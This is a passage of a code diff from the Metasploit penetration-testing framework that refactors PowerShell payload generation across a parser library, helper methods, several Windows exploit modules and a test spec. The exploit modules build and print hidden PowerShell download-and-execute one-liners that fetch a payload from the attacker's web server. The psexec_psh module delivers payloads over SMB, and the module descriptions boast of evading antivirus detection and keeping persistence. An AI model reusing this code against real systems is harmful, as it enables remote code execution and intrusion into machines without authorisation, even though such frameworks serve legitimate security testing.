+          '$ReportErrorShowSource',
+          '$ReportErrorShowStackTrace',
+          '$ShellId',
+          '$StackTrace',
+          '$true',
+          '$VerbosePreference',
+          '$WarningPreference',
+          '$WhatIfPreference'
+        ].map(&:downcase).freeze
+
+        #
+        # Get variable names from code, removes reserved names from return
+        #
+        # @return [Array] variable names
+        def get_var_names
+          our_vars = code.scan(/\$[a-zA-Z\-\_0-9]+/).uniq.flatten.map(&:strip)
+          our_vars.select { |v| !RESERVED_VARIABLE_NAMES.include?(v.downcase) }
+        end
+
+        #
+        # Get function names from code
+        #
+        # @return [Array] function names
+        def get_func_names
+          code.scan(/function\s([a-zA-Z\-\_0-9]+)/).uniq.flatten
+        end
+
+        #
+        # Attempt to find string literals in PSH expression
+        #
+        # @return [Array] string literals
+        def get_string_literals
+          code.scan(/@"(.+?)"@|@'(.+?)'@/m)
+        end
+
+        #
+        # Scan code and return matches with index
+        #
+        # @param str [String] string to match in code
+        # @param source [String] source code to match, defaults to @code
+        #
+        # @return [Array[String,Integer]] matched items with index
+        def scan_with_index(str, source = code)
+          ::Enumerator.new do |y|
+            source.scan(str) do
+              y << ::Regexp.last_match
+            end
+          end.map { |m| [m.to_s, m.offset(0)[0]] }
+        end
+
+        #
+        # Return matching bracket type
+        #
+        # @param char [String] opening bracket character
+        #
+        # @return [String] matching closing bracket
+        def match_start(char)
+          case char
+          when '{'
+            '}'
+          when '('
+            ')'
+          when '['
+            ']'
+          when '<'
+            '>'
+          else
+            fail ArgumentError, 'Unknown starting bracket'
+          end
+        end
+
+        #
+        # Extract block of code inside brackets/parenthesis
+        #
+        # Attempts to match the bracket at idx, handling nesting manually
+        # Once the balanced matching bracket is found, all script content
+        # between idx and the index of the matching bracket is returned
+        #
+        # @param idx [Integer] index of opening bracket
+        #
+        # @return [String] content between matching brackets
+        def block_extract(idx)
+          fail ArgumentError unless idx
+
+          if idx < 0 || idx >= code.length
+            fail ArgumentError, 'Invalid index'
+          end
+
+          start = code[idx]
+          stop = match_start(start)
+          delims = scan_with_index(/#{Regexp.escape(start)}|#{Regexp.escape(stop)}/, code[idx + 1..-1])
+          delims.map { |x| x[1] = x[1] + idx + 1 }
+          c = 1
+          sidx = nil
+          # Go through delims till we balance, get idx
+          while (c != 0) && (x = delims.shift)
+            sidx = x[1]
+            x[0] == stop ? c -= 1 : c += 1
+          end
+
+          code[idx..sidx]
+        end
+
+        #
+        # Extract a block of function code
+        #
+        # @param func_name [String] function name
+        # @param delete [Boolean] delete the function from the code
+        #
+        # @return [String] function block
+        def get_func(func_name, delete = false)
+          start = code.index(func_name)
+
+          return nil unless start
+
+          idx = code[start..-1].index('{') + start
+          func_txt = block_extract(idx)
+
+          if delete
+            delete_code = code[0..idx]
+            delete_code << code[(idx + func_txt.length)..-1]
+            @code = delete_code
+          end
+
+          Function.new(func_name, func_txt)
+        end
+      end # Parser
+    end
+  end
+end
diff --git a/lib/rex/exploitation/powershell/psh_methods.rb b/lib/rex/exploitation/powershell/psh_methods.rb
new file mode 100644
index 000000000000..d53fde9d4872
--- /dev/null
+++ b/lib/rex/exploitation/powershell/psh_methods.rb
@@ -0,0 +1,70 @@
+# -*- coding: binary -*-
+
+module Rex
+module Exploitation
+module Powershell
+  ##
+  # Convenience methods for generating powershell code in Ruby
+  ##
+
+  module PshMethods
+    #
+    # Download file via .NET WebClient
+    #
+    # @param src [String] URL to the file
+    # @param target [String] Location to save the file
+    #
+    # @return [String] Powershell code to download a file
+    def self.download(src, target)
+      target ||= '$pwd\\' << src.split('/').last
+      %Q^(new-object System.Net.WebClient).DownloadFile("#{src}", "#{target}")^
+    end
+
+    #
+    # Uninstall app, or anything named like app
+    #
+    # @param app [String] Name of application
+    # @param fuzzy [Boolean] Whether to apply a fuzzy match (-like) to
+    #   the application name
+    #
+    # @return [String] Powershell code to uninstall an application
+    def self.uninstall(app, fuzzy = true)
+      match = fuzzy ? '-like' : '-eq'
+      %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
+    end
+
+    #
+    # Create secure string from plaintext
+    #
+    # @param str [String] String to create as a SecureString
+    #
+    # @return [String] Powershell code to create a SecureString
+    def self.secure_string(str)
+      %Q(ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$)
+    end
+
+    #
+    # Find PID of file lock owner
+    #
+    # @param filename [String] Filename
+    #
+    # @return [String] Powershell code to identify the PID of a file
+    #   lock owner
+    def self.who_locked_file(filename)
+      %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
+    end
+
+    #
+    # Return last time of login
+    #
+    # @param user [String] Username
+    #
+    # @return [String] Powershell code to return the last time of a user
+    #   login
+    def self.get_last_login(user)
+      %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
+    end
+  end
+end
+end
+end
diff --git a/lib/rex/exploitation/powershell/script.rb b/lib/rex/exploitation/powershell/script.rb
new file mode 100644
index 000000000000..0892b6b676ec
--- /dev/null
+++ b/lib/rex/exploitation/powershell/script.rb
@@ -0,0 +1,98 @@
+# -*- coding: binary -*-
+
+require 'rex'
+
+module Rex
+module Exploitation
+module Powershell
+  class Script
+    attr_accessor :code
+    attr_reader :functions, :rig
+
+    include Output
+    include Parser
+    include Obfu
+    # Pretend we are actually a string
+    extend Forwardable
+    # In case someone messes with String we delegate based on its instance methods
+    # eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
+    def_delegators :@code, :each_line, :strip, :chars, :intern, :chr, :casecmp, :ascii_only?, :<, :tr_s,
+                   :!=, :capitalize!, :ljust, :to_r, :sum, :private_methods, :gsub, :dump, :match, :to_sym,
+                   :enum_for, :display, :tr_s!, :freeze, :gsub, :split, :rindex, :<<, :<=>, :+, :lstrip!,
+                   :encoding, :start_with?, :swapcase, :lstrip!, :encoding, :start_with?, :swapcase,
+                   :each_byte, :lstrip, :codepoints, :insert, :getbyte, :swapcase!, :delete, :rjust, :>=,
+                   :!, :count, :slice, :clone, :chop!, :prepend, :succ!, :upcase, :include?, :frozen?,
+                   :delete!, :chop, :lines, :replace, :next, :=~, :==, :rstrip!, :%, :upcase!, :each_char,
+                   :hash, :rstrip, :length, :reverse, :setbyte, :bytesize, :squeeze, :>, :center, :[],
+                   :<=, :to_c, :slice!, :chomp!, :next!, :downcase, :unpack, :crypt, :partition,
+                   :between?, :squeeze!, :to_s, :chomp, :bytes, :clear, :!~, :to_i, :valid_encoding?, :===,
+                   :tr, :downcase!, :scan, :sub!, :each_codepoint, :reverse!, :class, :size, :empty?, :byteslice,
+                   :initialize_clone, :to_str, :to_enum, :tap, :tr!, :trust, :encode!, :sub, :oct, :succ, :index,
+                   :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
+                   :end_with?
+
+    def initialize(code)
+      @code = ''
+      @rig = Rex::RandomIdentifierGenerator.new
+
+      begin
+        # Open code file for reading
+        fd = ::File.new(code, 'rb')
+        while (line = fd.gets)
+          @code << line
+        end
+
+        # Close open file
+        fd.close
+      rescue Errno::ENAMETOOLONG, Errno::ENOENT
+        # Treat code as a... code
+        @code = code.to_s.dup # in case we're eating another script
+      end
+      @functions = get_func_names.map { |f| get_func(f) }
+    end
+
+    ##
+    # Class methods
+    ##
+
+    #
+    # Convert binary to byte array, read from file if able
+    #
+    # @param input_data [String] Path to powershell file or powershell
+    #   code string
+    # @param var_name [String] Byte array variable name
+    #
+    # @return [String] input_data as a powershell byte array
+    def self.to_byte_array(input_data, var_name = Rex::Text.rand_text_alpha(rand(3) + 3))
+      # File will raise an exception if the path contains null byte
+      if input_data.include? "\x00"
+        code = input_data
+      else
+        code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      end
+
+      code = code.unpack('C*')
+      psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
+      lines = []
+      1.upto(code.length - 1) do |byte|
+        if (byte % 10 == 0)
+          lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+        else
+          lines.push ",0x#{code[byte].to_s(16)}"
+        end
+      end
+
+      psh << lines.join('') + "\r\n"
+    end
+
+    #
+    # Return list of code modifier methods
+    #
+    # @return [Array] Code modifiers
+    def self.code_modifiers
+      instance_methods.select { |m| m =~ /^(strip|sub)/ }
+    end
+  end # class Script
+end
+end
+end
diff --git a/lib/rex/text.rb b/lib/rex/text.rb
index fcf5bdb2417e..d33bdf18b024 100644
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -3,6 +3,7 @@
 require 'digest/sha1'
 require 'stringio'
 require 'cgi'
+require 'rex/exploitation/powershell'
 
 %W{ iconv zlib }.each do |libname|
   begin
@@ -305,19 +306,7 @@ def self.to_java(str, name = "shell")
   # Converts a raw string to a powershell byte array
   #
   def self.to_powershell(str, name = "buf")
-    return "[Byte[]]$#{name} = ''" if str.nil? or str.empty?
-
-    code = str.unpack('C*')
-    buff = "[Byte[]]$#{name} = 0x#{code[0].to_s(16)}"
-    1.upto(code.length-1) do |byte|
-      if(byte % 10 == 0)
-        buff << "\r\n$#{name} += 0x#{code[byte].to_s(16)}"
-      else
-        buff << ",0x#{code[byte].to_s(16)}"
-      end
-    end
-
-    return buff
+    return Rex::Exploitation::Powershell::Script.to_byte_array(str, name)
   end
 
   #
diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb
index 5a94b56a6e61..7f8f731d917a 100644
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -87,7 +87,11 @@ def primer
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
     when "PSH_x86", "PSH_x64"
       download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-      print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
+      print_line generate_psh_command_line({
+                                     :noprofile => true,
+                                     :windowstyle => 'hidden',
+                                     :command => download_and_run
+                                 })
     end
   end
 end
diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb
index d699ef0a169d..878d20bd4537 100644
--- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb
+++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb
@@ -120,7 +120,7 @@ def vbs_technique(var_shellobj, p)
   end
 
   def psh_technique(var_shellobj, p)
-    cmd = Rex::Text.to_hex(cmd_psh_payload(p.encoded))
+    cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first))
     js_content = %Q|
 //<html><head></head><body><script>
 var #{var_shellobj} = new ActiveXObject("WScript.Shell");
diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb
index 90e3dceda14d..a9d38e3d36d0 100644
--- a/modules/exploits/windows/http/oracle_endeca_exec.rb
+++ b/modules/exploits/windows/http/oracle_endeca_exec.rb
@@ -126,7 +126,7 @@ def send_request_soap(data)
   end
 
   def exploit
-    command = cmd_psh_payload(payload.encoded)
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
     if command.length > 8000
       # Windows 2008 Command Prompt Max Length is 8191
       fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")
diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb
index c8f090f42c7c..c0ca1797be5d 100644
--- a/modules/exploits/windows/local/current_user_psexec.rb
+++ b/modules/exploits/windows/local/current_user_psexec.rb
@@ -98,7 +98,7 @@ def exploit
 
       service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
     else
-      service_executable = cmd_psh_payload(payload.encoded)
+      service_executable = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
     end
 
     begin
diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
index 6c6e5cf822e5..b77f29b706f1 100644
--- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
+++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
@@ -51,7 +51,11 @@ def initialize(info={})
         [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
       ],
       'DefaultTarget' => 0,
-      'DisclosureDate'=> "Nov 27 2012",
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 40,
+        },
+      'DisclosureDate' => "Nov 27 2012",
       'References' =>
         [
           [ 'CVE', '2013-0008' ],
@@ -160,7 +164,7 @@ def exploit
         command = datastore['CUSTOM_COMMAND']
       else
         print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the powershell command line payload")
-        command = cmd_psh_payload(payload.encoded)
+        command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
       end
       make_it(command)
     else
@@ -171,7 +175,11 @@ def exploit
   def primer
     url = get_uri()
     download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-    command = "powershell.exe -w hidden -nop -c #{download_and_run}"
+    command = generate_psh_command_line({
+      :noprofile => true,
+      :windowstyle => 'hidden',
+      :command => download_and_run
+    })
     make_it(command)
   end
 
diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
index 1cf3a6204c03..d97db170ce8e 100644
--- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
+++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
@@ -79,7 +79,14 @@ def exploit
   end
 
   def primer
-    cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
+    cmd = cmd_psh_payload(payload.encoded,
+                          payload_instance.arch.first,
+                          {
+                            :remove_comspec => true
+                          }
+                         )
+
+    cmd.gsub!('powershell.exe ','')
     session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", cmd)
 
     html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html"
diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
index 89b2bf9e3204..4fc5101b5960 100644
--- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
+++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
@@ -148,7 +148,14 @@ def exploit
 
     print_good(".NET looks vulnerable, exploiting...")
 
-    cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
+    cmd = cmd_psh_payload(payload.encoded,
+                          payload_instance.arch.first,
+                          {
+                            :remove_comspec => true
+                          }
+                         )
+
+    cmd.gsub!('powershell.exe ','')
     session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
 
     temp = get_env('TEMP')
diff --git a/modules/exploits/windows/local/powershell_cmd_upgrade.rb b/modules/exploits/windows/local/powershell_cmd_upgrade.rb
index 5b46139a50d7..d72baa6166f5 100644
--- a/modules/exploits/windows/local/powershell_cmd_upgrade.rb
+++ b/modules/exploits/windows/local/powershell_cmd_upgrade.rb
@@ -40,7 +40,8 @@ def exploit
 
     if file? "%WINDIR%\\System32#{psh_path}"
       print_status("Executing powershell command line...")
-      cmd_exec(cmd_psh_payload(payload.encoded))
+      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+      cmd_exec(command)
     else
       fail_with(Exploit::Failure::NotVulnerable, "No powershell available.")
     end
diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb
index c7b36319b2f6..296887886224 100644
--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -49,10 +49,9 @@ def initialize(info={})
         'DisclosureDate' => 'Jan 01 1999',
         'Platform'      => [ 'win' ],
         'SessionTypes'  => [ 'meterpreter' ],
-        'Targets'	=>
+        'Targets'       =>
         [
-            [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
-            [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+            [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X86_64] } ],
         ],
         'DefaultTarget' => 0
       ))
@@ -79,9 +78,14 @@ def exploit
   def run_host(server)
     # Get the PSH Payload and split it into bitesize chunks
     # 1024 appears to be the max value allowed in env vars
-    psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
-    psh = psh[psh.index("$si")..psh.length-1]
-    chunks = split_code(psh, 1024)
+    psh = cmd_psh_payload(payload.encoded,
+                          payload_instance.arch.first,
+                          {
+                              :remove_comspec => true,
+                              :encode_inner_payload => true,
+                              :use_single_quotes => true
+                          })
+    chunks = split_code(psh, 1000)
 
     begin
       print_status("[#{server}] Storing payload in environment variables")
@@ -99,7 +103,11 @@ def run_host(server)
       end
 
       x = rand_text_alpha(rand(3)+3)
-      exec_cmd = "powershell.exe -nop -w hidden -c $#{x} = ''"
+      exec_cmd = generate_psh_command_line({
+        :noprofile => true,
+        :windowstyle => 'hidden',
+        :command => "$#{x}=''"
+      })
       env_vars.each do |env|
         exec_cmd << "+$env:#{env}"
       end
@@ -126,6 +134,8 @@ def run_host(server)
     rescue Rex::Post::Meterpreter::RequestError => e
       print_error("[#{server}] Error moving on... #{e}")
       return false
+    ensure
+        Rex::sleep(2)
     end
   end
 
diff --git a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb
index a8f93dd1e199..bed2a38e1909 100644
--- a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb
@@ -95,7 +95,7 @@ def exploit
       execute_cmdstager({:flavor => :vbs, :linemax => 7500})
     elsif target.name =~ /Powershell/
       # Environment variables are not being expanded before, neither in CreateProcess
-      command = cmd_psh_payload(payload.encoded).gsub(/%COMSPEC% /, "")
+      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
       if command.length > 8000
         # Windows 2008 Command Prompt Max Length is 8191
         fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")
diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
index 2f2ce9ab378c..ca485fa83ac0 100644
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/powershell'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Powershell
 
   include Msf::Module::Deprecated
 
@@ -17,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'		 => 'PowerShell Payload Web Delivery',
-      'Description'	 => %q{
+      'Name' => 'PowerShell Payload Web Delivery',
+      'Description' => %q{
         This module quickly fires up a web server that serves the payload in PowerShell.
         The provided command will start PowerShell and then download and execute the
         payload. The IEX command can also be extracted to execute directly from PowerShell.
@@ -26,42 +28,50 @@ def initialize(info = {})
         machine when the attacker has to manually type in the command himself, e.g. RDP
         Session, Local Access or maybe Remote Command Exec. This attack vector does not
         write to disk so is less likely to trigger AV solutions and will allow privilege
-        escalations supplied by Meterpreter. Ensure the payload architecture matches the
-        target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
+        escalations supplied by Meterpreter.
       },
-      'License'	 => MSF_LICENSE,
-      'Author'	 =>
+      'License' => MSF_LICENSE,
+      'Author' =>
         [
           'Ben Campbell',
           'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
         ],
-      'References'	 =>
+      'References' =>
         [
           [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
           [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
           [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
         ],
-      'Platform'	 => 'win',
-      'Targets'	 =>
+      'Platform' => 'win',
+      'Targets' =>
         [
-          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
-          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+          [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X86_64] } ]
         ],
-      'DefaultTarget'  => 0,
+      'DefaultTarget' => 0,
       'DisclosureDate' => 'Jul 19 2013'))
   end
 
   def on_request_uri(cli, request)
     print_status("Delivering Payload")
-    data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
-    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+
+    psh = cmd_psh_payload(payload.encoded,
+                          payload_instance.arch.first,
+                          {
+                              :remove_comspec => true,
+                              :use_single_quotes => true
+                          })
+    send_response(cli, psh, { 'Content-Type' => 'application/octet-stream' })
   end
 
   def primer
     url = get_uri()
     download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
     print_status("Run the following command on the target machine:")
-    print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
+    print_line generate_psh_command_line({
+                                     :noprofile => true,
+                                     :windowstyle => 'hidden',
+                                     :command => download_and_run
+                                 })
   end
 end
 
diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb
index 1e54d0015049..05fc79a31f14 100644
--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -23,20 +23,18 @@ def initialize(info = {})
         payload using a similar technique to the "psexec" utility provided by SysInternals. The
         payload is encoded in base64 and executed from the commandline using the -encodedcommand
         flag. Using this method, the payload is never written to disk, and given that each payload
-        is unique, is less prone to signature based detection. Since executing shellcode in .NET
-        requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
-        must match that of the payload. Lastly, a persist option is provided to execute the payload
-        in a while loop in order to maintain a form of persistence. In the event of a sandbox
-        observing PSH execution, a delay and other obfuscation may be added to avoid detection.
-        In order to avoid interactive process notifications for the current user, the psh payload has
-        been reduced in size and wrapped in a powershell invocation which hides the process entirely.
+        is unique, is less prone to signature based detection. A persist option is provided to
+        execute the payload in a while loop in order to maintain a form of persistence. In the
+        event of a sandbox observing PSH execution, a delay and other obfuscation may be added to
+        avoid detection. In order to avoid interactive process notifications for the current user,
+        the psh payload has been reduced in size and wrapped in a powershell invocation which hides
+        the window entirely.
       },
 
       'Author'         => [
         'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
         'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
       ],
-
       'License'        => MSF_LICENSE,
       'Privileged'     => true,
       'DefaultOptions' =>
@@ -44,17 +42,10 @@ def initialize(info = {})
           'WfsDelay'     => 10,
           'EXITFUNC' => 'thread'
         },
-      'Payload'        =>
-        {
-          'Space'        => 8192,
-          'DisableNops'  => true,
-          'StackAdjustment' => -3500
-        },
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
-          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jan 01 1999',
@@ -66,17 +57,21 @@ def initialize(info = {})
         [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
       ]
     ))
+
+    register_options([
+      OptBool.new('DryRun',[false,'Prints the powershell command that would be used',false]),
+    ], self.class)
   end
 
   def exploit
-    command = cmd_psh_payload(payload.encoded)
-
-    if datastore['PERSIST'] and not datastore['DisablePayloadHandler']
-      print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PERSIST option.")
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+    if datastore['DryRun']
+      print_good command.inspect
+      return
     end
 
-    if datastore['RUN_WOW64'] and target_arch.first == "x86_64"
-      fail_with(Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
+    if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
+      print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
     end
 
     # Try and authenticate with given credentials
@@ -84,16 +79,16 @@ def exploit
       begin
         smb_login
       rescue StandardError => autherror
-        disconnect
-        fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
+        fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
       end
       # Execute the powershell command
       print_status("#{peer} - Executing the payload...")
       begin
         return psexec(command)
       rescue StandardError => exec_command_error
+        fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
+      ensure
         disconnect
-        fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
       end
     end
   end
diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb
new file mode 100644
index 000000000000..3b67509ff359
--- /dev/null
+++ b/spec/lib/msf/core/exploit/powershell_spec.rb
@@ -0,0 +1,488 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+def decompress(code)
+  Rex::Exploitation::Powershell::Script.new(code).decompress_code
+end
+
+describe Msf::Exploit::Powershell do
+  subject do
+    mod = Msf::Exploit.allocate
+    mod.extend described_class
+    mod.send(:initialize, {})
+    mod.datastore['Verbose'] = true
+    mod
+  end
+
+  let(:example_script) do
+    File.join(Msf::Config.data_directory, "exploits", "powershell", "powerdump.ps1")
+  end
+
+  let(:payload) do
+    Rex::Text.rand_text_alpha(120)
+  end
+
+  let(:arch) do
+    'x86'
+  end
+
+  describe "::encode_script" do
+    it 'should read and encode a sample script file' do
+      script = subject.encode_script(example_script)
+      script.should be
+      script.length.should be > 0
+    end
+  end
+
+  describe "::compress_script" do
+    context 'when default datastore is set' do
+      it 'should create a compressed script' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        compressed.length.should be < script.length
+        compressed.include?('IO.Compression').should be_true
+      end
+
+      it 'should create a compressed script with eof' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script, 'end_of_file')
+        compressed.include?('end_of_file').should be_true
+      end
+    end
+
+    context 'when strip_comments is true' do
+      before do
+        subject.datastore['Powershell::strip_comments'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should strip comments' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        compressed.length.should be < script.length
+      end
+    end
+    context 'when strip_comment is false' do
+      before do
+        subject.datastore['Powershell::strip_comments'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt strip comments' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        compressed.length.should be < script.length
+      end
+    end
+
+    context 'when strip_whitespace is true' do
+      before do
+        subject.datastore['Powershell::strip_whitespace'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should strip whitespace' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).length.should be < script.length
+      end
+    end
+
+    context 'when strip_whitespace is false' do
+      before do
+        subject.datastore['Powershell::strip_whitespace'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt strip whitespace' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).length.should be script.length
+      end
+    end
+
+    context 'when sub_vars is true' do
+      before do
+        subject.datastore['Powershell::sub_vars'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should substitute variables' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).include?('$hashes').should be_false
+      end
+    end
+
+    context 'when sub_vars is false' do
+      before do
+        subject.datastore['Powershell::sub_vars'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt substitute variables' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).include?('$hashes').should be_true
+      end
+    end
+
+    context 'when sub_funcs is true' do
+      before do
+        subject.datastore['Powershell::sub_funcs'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should substitute functions' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).include?('DumpHashes').should be_false
+      end
+    end
+
+    context 'when sub_funcs is false' do
+      before do
+        subject.datastore['Powershell::sub_funcs'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt substitute variables' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).include?('DumpHashes').should be_true
+      end
+    end
+  end
+
+  describe "::run_hidden_psh" do
+
+
+    let(:encoded) do
+      false
+    end
+
+    context 'when x86 payload' do
+      it 'should generate code' do
+        code = subject.run_hidden_psh(payload, arch, encoded)
+        code.include?('syswow64').should be_true
+      end
+    end
+
+    context 'when x64 payload' do
+      it 'should generate code'  do
+        code = subject.run_hidden_psh(payload, 'x86_64', encoded)
+        code.include?('sysnative').should be_true
+      end
+    end
+
+    context 'when encoded' do
+      it 'should generate a code including an encoded command' do
+        code = subject.run_hidden_psh(payload, arch, true)
+        code.include?('-nop -w hidden -e ').should be_true
+      end
+    end
+
+    context 'when command' do
+      it 'should generate code including a -c command' do
+        code = subject.run_hidden_psh(payload, arch, encoded)
+        code.include?('-nop -w hidden -c ').should be_true
+      end
+    end
+
